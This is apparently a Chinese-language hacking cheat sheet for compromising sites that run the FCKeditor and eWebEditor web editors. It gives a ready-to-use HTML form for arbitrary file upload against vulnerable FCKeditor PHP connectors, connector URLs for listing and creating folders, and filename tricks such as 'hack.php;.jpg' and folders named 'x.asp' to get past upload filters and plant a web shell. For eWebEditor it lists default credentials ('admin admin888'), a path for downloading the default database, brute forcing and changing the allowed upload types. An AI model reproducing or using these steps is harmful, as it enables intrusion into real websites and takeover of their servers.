1. FCKeditor
编辑器页面
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
fckeditor/editor/filemanager/connectors/test.html
查看编辑器版本
将url中FCKeditor后面的内容改为_whatsnew.html
如下:www.sss.com/FCKeditor/_whatsnew.html
Version 2.2
在apache+linux 环境下在上传文件后面加个.突破
Version <=2.4.2 For php
在处理PHP在上传的地方并未对media类型进行进行上传文件类型的控制,导致用户上传任意文件!将以下代码中action内的url改为目标url并保存为html文件,就可以生成一个指向目标站点的文件上传页面,
<form id="fmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor?filemanage/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name ="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor 文件上传“.”变“_”下划线的绕过方法
大多情况下上传的文件:,hack.php.rar 或hack.php;.jpg会变为shell_php;.jpg,可以通过二次上传同名文件可变为hack.php;(1).jpg ,如果绕不过,那就新建一个文件夹,绕过一级目录的检测,二级目录不受限制,也就是下边的突破建立文件夹
突破建立文件夹
FCKeditor_2.5/editor/filemanager/connectors/asp/connector.aspCommand=Createfolder&Type=Image&Currentfolder=/xx.asp&NewFoldername=x.asp
就是在xx.asp目录下创建一个x.asp
FCKeditor中test文件的上传地址
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
绕过asp;.jpg变asp_jpg
使用特殊名称绕过
a.aspx.a;.a.aspx.jpg…jpg.aspx
xx.asp.;.jpg
2. EWEbeditor
1).进后台
1))通过弱口令 admin admin888
2))修改url下载默认数据库,找登陆密码
ewebeditor/db/ewebeditor.mdb
3))burp抓包爆破
4))利用注入点得到密码
5))如果没有后台
利用目录遍历漏洞,找网站数据库位置下载网站数据库,登录网站后台拿shell
6))利用exp进行
7))构造上传
2).修改允许上传的类型
3).自己添加上传样式以后添加上传按钮一一上传
选择样式管理,新增样式,命名样式,添加类型,提交。再添加工具栏,添加按钮(图片),通过软件模拟浏览器版本,上传图片
4)爆目录,进入url/editor目录
通过尝试进入editor目录下的admin_upload(可能不存在,或者是其他文件名比如admin_uploadfile等)选择样式目录,修改id=&dir=… 爆目录